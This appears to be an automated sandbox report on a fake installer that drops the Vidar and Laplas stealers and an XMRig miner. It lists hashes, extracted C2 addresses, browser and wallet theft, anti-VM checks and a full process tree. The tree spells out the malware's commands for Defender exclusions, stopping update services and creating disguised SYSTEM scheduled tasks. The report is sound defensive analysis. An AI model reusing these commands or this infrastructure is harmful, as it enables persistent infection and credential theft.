Analysis
-
max time kernel
138s -
max time network
192s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
19-06-2023 10:50
Static task
static1
Behavioral task
behavioral1
Sample
Set-up32Х64bit.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
Set-up32Х64bit.exe
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
hppdgenio.exe
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
hppdgenio.exe
Resource
win10v2004-20230220-en
General
-
Target
Set-up32Х64bit.exe
-
Size
679.4MB
-
MD5
966ec75230924b2b513a0863e9e7beaa
-
SHA1
0e6e3a39a15a0d2070ac950319f385827d05f4de
-
SHA256
695f49289cd6e738df053992689d2852ab0b409ed33381955b85c11cf7e1db6d
-
SHA512
6bb2152db314eefebaffb0069382c454602ded0771d1ef0985ea06e0348d565d123beb40da434ae63eb84debfcf420c45da150bc0a9fa7d3701772b4c83bca95
-
SSDEEP
12582912:3eQyQyQyQyQyQyQyQyQyQyQyQyQyQyQyQyQyQyQyQyQyQyQyQyQyQyQyQyQyQyQy:3ennnnnnnnnnnnnnnnnnnnnnnnnnnnnr
Malware Config
Extracted
vidar
4.3
7b7fdb9f9b9361515285b7dadea32e20
https://steamcommunity.com/profiles/76561199514261168
https://t.me/kamaprimo
-
profile_id_v2
7b7fdb9f9b9361515285b7dadea32e20
-
user_agent
Mozilla/5.0 (Linux; U; Tizen 2.0; en-us) AppleWebKit/537.1 (KHTML, like Gecko) Mobile TizenBrowser/2.0
Extracted
laplas
http://185.209.161.89
-
api_key
6a2714906f1325d666e4cf9f6269c2352ccfb7e7f1a23c114287dc69ddf27cb0
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
description pid Process procid_target PID 1144 created 1272 1144 51377823967676717365.exe 14 PID 1144 created 1272 1144 51377823967676717365.exe 14 PID 1144 created 1272 1144 51377823967676717365.exe 14 PID 1144 created 1272 1144 51377823967676717365.exe 14 PID 1144 created 1272 1144 51377823967676717365.exe 14 PID 1968 created 1272 1968 updater.exe 14 PID 1968 created 1272 1968 updater.exe 14 PID 1968 created 1272 1968 updater.exe 14 PID 1968 created 1272 1968 updater.exe 14 PID 1968 created 1272 1968 updater.exe 14 PID 1968 created 1272 1968 updater.exe 14 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 08316174909165120831.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ntlhost.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Set-up32Х64bit.exe -
XMRig Miner payload 1 IoCs
resource yara_rule behavioral1/memory/1968-257-0x000000013F950000-0x0000000140335000-memory.dmp xmrig -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts 51377823967676717365.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Set-up32Х64bit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Set-up32Х64bit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 08316174909165120831.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 08316174909165120831.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ntlhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ntlhost.exe -
Deletes itself 1 IoCs
pid Process 1568 cmd.exe -
Executes dropped EXE 4 IoCs
pid Process 1060 08316174909165120831.exe 1144 51377823967676717365.exe 1564 ntlhost.exe 1968 updater.exe -
Loads dropped DLL 6 IoCs
pid Process 1756 Set-up32Х64bit.exe 1756 Set-up32Х64bit.exe 1756 Set-up32Х64bit.exe 1756 Set-up32Х64bit.exe 1060 08316174909165120831.exe 604 taskeng.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" 08316174909165120831.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Set-up32Х64bit.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 08316174909165120831.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ntlhost.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 1756 Set-up32Х64bit.exe 1060 08316174909165120831.exe 1564 ntlhost.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1968 set thread context of 1956 1968 updater.exe 77 PID 1968 set thread context of 1240 1968 updater.exe 78 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe 51377823967676717365.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1268 sc.exe 1800 sc.exe 844 sc.exe 1548 sc.exe 1924 sc.exe 848 sc.exe 1492 sc.exe 1328 sc.exe 908 sc.exe 1580 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Set-up32Х64bit.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Set-up32Х64bit.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1472 schtasks.exe 1644 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1248 timeout.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 20 Go-http-client/1.1 -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b04d85809ca2d901 powershell.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a Set-up32Х64bit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 Set-up32Х64bit.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a Set-up32Х64bit.exe -
Suspicious behavior: EnumeratesProcesses 57 IoCs
pid Process 1756 Set-up32Х64bit.exe 1756 Set-up32Х64bit.exe 1756 Set-up32Х64bit.exe 1756 Set-up32Х64bit.exe 1756 Set-up32Х64bit.exe 1756 Set-up32Х64bit.exe 1756 Set-up32Х64bit.exe 1756 Set-up32Х64bit.exe 1756 Set-up32Х64bit.exe 1756 Set-up32Х64bit.exe 1756 Set-up32Х64bit.exe 1756 Set-up32Х64bit.exe 1756 Set-up32Х64bit.exe 1756 Set-up32Х64bit.exe 1756 Set-up32Х64bit.exe 1756 Set-up32Х64bit.exe 1756 Set-up32Х64bit.exe 1756 Set-up32Х64bit.exe 1756 Set-up32Х64bit.exe 1756 Set-up32Х64bit.exe 1756 Set-up32Х64bit.exe 1756 Set-up32Х64bit.exe 1756 Set-up32Х64bit.exe 1144 51377823967676717365.exe 1144 51377823967676717365.exe 976 powershell.exe 1144 51377823967676717365.exe 1144 51377823967676717365.exe 1144 51377823967676717365.exe 1144 51377823967676717365.exe 1144 51377823967676717365.exe 1144 51377823967676717365.exe 1172 powershell.exe 1144 51377823967676717365.exe 1144 51377823967676717365.exe 1968 updater.exe 1968 updater.exe 1908 powershell.exe 1968 updater.exe 1968 updater.exe 1968 updater.exe 1968 updater.exe 1968 updater.exe 1968 updater.exe 1008 powershell.exe 1968 updater.exe 1968 updater.exe 1968 updater.exe 1968 updater.exe 1240 conhost.exe 1240 conhost.exe 1240 conhost.exe 1240 conhost.exe 1240 conhost.exe 1240 conhost.exe 1240 conhost.exe 1240 conhost.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeDebugPrivilege 976 powershell.exe Token: SeShutdownPrivilege 1228 powercfg.exe Token: SeShutdownPrivilege 1816 powercfg.exe Token: SeShutdownPrivilege 300 powercfg.exe Token: SeDebugPrivilege 1172 powershell.exe Token: SeShutdownPrivilege 1092 powercfg.exe Token: SeDebugPrivilege 1908 powershell.exe Token: SeShutdownPrivilege 560 powercfg.exe Token: SeShutdownPrivilege 1228 powercfg.exe Token: SeShutdownPrivilege 1948 powercfg.exe Token: SeDebugPrivilege 1008 powershell.exe Token: SeShutdownPrivilege 692 powercfg.exe Token: SeDebugPrivilege 1968 updater.exe Token: SeLockMemoryPrivilege 1240 conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1756 wrote to memory of 1060 1756 Set-up32Х64bit.exe 31 PID 1756 wrote to memory of 1060 1756 Set-up32Х64bit.exe 31 PID 1756 wrote to memory of 1060 1756 Set-up32Х64bit.exe 31 PID 1756 wrote to memory of 1060 1756 Set-up32Х64bit.exe 31 PID 1756 wrote to memory of 1144 1756 Set-up32Х64bit.exe 32 PID 1756 wrote to memory of 1144 1756 Set-up32Х64bit.exe 32 PID 1756 wrote to memory of 1144 1756 Set-up32Х64bit.exe 32 PID 1756 wrote to memory of 1144 1756 Set-up32Х64bit.exe 32 PID 1756 wrote to memory of 1568 1756 Set-up32Х64bit.exe 33 PID 1756 wrote to memory of 1568 1756 Set-up32Х64bit.exe 33 PID 1756 wrote to memory of 1568 1756 Set-up32Х64bit.exe 33 PID 1756 wrote to memory of 1568 1756 Set-up32Х64bit.exe 33 PID 1568 wrote to memory of 1248 1568 cmd.exe 35 PID 1568 wrote to memory of 1248 1568 cmd.exe 35 PID 1568 wrote to memory of 1248 1568 cmd.exe 35 PID 1568 wrote to memory of 1248 1568 cmd.exe 35 PID 1060 wrote to memory of 1564 1060 08316174909165120831.exe 36 PID 1060 wrote to memory of 1564 1060 08316174909165120831.exe 36 PID 1060 wrote to memory of 1564 1060 08316174909165120831.exe 36 PID 1412 wrote to memory of 1580 1412 cmd.exe 41 PID 1412 wrote to memory of 1580 1412 cmd.exe 41 PID 1412 wrote to memory of 1580 1412 cmd.exe 41 PID 1412 wrote to memory of 1328 1412 cmd.exe 42 PID 1412 wrote to memory of 1328 1412 cmd.exe 42 PID 1412 wrote to memory of 1328 1412 cmd.exe 42 PID 1412 wrote to memory of 1268 1412 cmd.exe 43 PID 1412 wrote to memory of 1268 1412 cmd.exe 43 PID 1412 wrote to memory of 1268 1412 cmd.exe 43 PID 1412 wrote to memory of 1800 1412 cmd.exe 44 PID 1412 wrote to memory of 1800 1412 cmd.exe 44 PID 1412 wrote to memory of 1800 1412 cmd.exe 44 PID 1412 wrote to memory of 844 1412 cmd.exe 45 PID 1412 wrote to memory of 844 1412 cmd.exe 45 PID 1412 wrote to memory of 844 1412 cmd.exe 45 PID 880 wrote to memory of 1228 880 cmd.exe 49 PID 880 wrote to memory of 1228 880 cmd.exe 49 PID 880 wrote to memory of 1228 880 cmd.exe 49 PID 880 wrote to memory of 1816 880 cmd.exe 51 PID 880 wrote to memory of 1816 880 cmd.exe 51 PID 880 wrote to memory of 1816 880 cmd.exe 51 PID 880 wrote to memory of 300 880 cmd.exe 52 PID 880 wrote to memory of 300 880 cmd.exe 52 PID 880 wrote to memory of 300 880 cmd.exe 52 PID 880 wrote to memory of 1092 880 cmd.exe 53 PID 880 wrote to memory of 1092 880 cmd.exe 53 PID 880 wrote to memory of 1092 880 cmd.exe 53 PID 1172 wrote to memory of 1472 1172 powershell.exe 54 PID 1172 wrote to memory of 1472 1172 powershell.exe 54 PID 1172 wrote to memory of 1472 1172 powershell.exe 54 PID 604 wrote to memory of 1968 604 taskeng.exe 58 PID 604 wrote to memory of 1968 604 taskeng.exe 58 PID 604 wrote to memory of 1968 604 taskeng.exe 58 PID 1224 wrote to memory of 908 1224 cmd.exe 63 PID 1224 wrote to memory of 908 1224 cmd.exe 63 PID 1224 wrote to memory of 908 1224 cmd.exe 63 PID 1224 wrote to memory of 1548 1224 cmd.exe 64 PID 1224 wrote to memory of 1548 1224 cmd.exe 64 PID 1224 wrote to memory of 1548 1224 cmd.exe 64 PID 1224 wrote to memory of 1924 1224 cmd.exe 65 PID 1224 wrote to memory of 1924 1224 cmd.exe 65 PID 1224 wrote to memory of 1924 1224 cmd.exe 65 PID 1224 wrote to memory of 848 1224 cmd.exe 66 PID 1224 wrote to memory of 848 1224 cmd.exe 66 PID 1224 wrote to memory of 848 1224 cmd.exe 66 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1272
-
C:\Users\Admin\AppData\Local\Temp\Set-up32Х64bit.exe"C:\Users\Admin\AppData\Local\Temp\Set-up32Х64bit.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\ProgramData\08316174909165120831.exe"C:\ProgramData\08316174909165120831.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exeC:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1564
-
-
-
C:\ProgramData\51377823967676717365.exe"C:\ProgramData\51377823967676717365.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1144
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Set-up32?64bit.exe" & exit3⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1568 -
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:1248
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:976
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1580
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1328
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1268
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1800
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:844
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:880 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1228
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:300
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1092
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ewltjtjow#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:1472
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:1716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1908
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:908
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1548
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1924
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:848
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1492
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ewltjtjow#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1008 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:1644
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:1116
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:560
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1228
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1948
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:692
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:1956
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1240
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {9027118F-076F-403A-928B-BD2716149D6D} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:604 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Impair Defenses
1Install Root Certificate
1Modify Registry
2Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9.9MB
MD5c75e8b78107d4e3a8e32d35e35919724
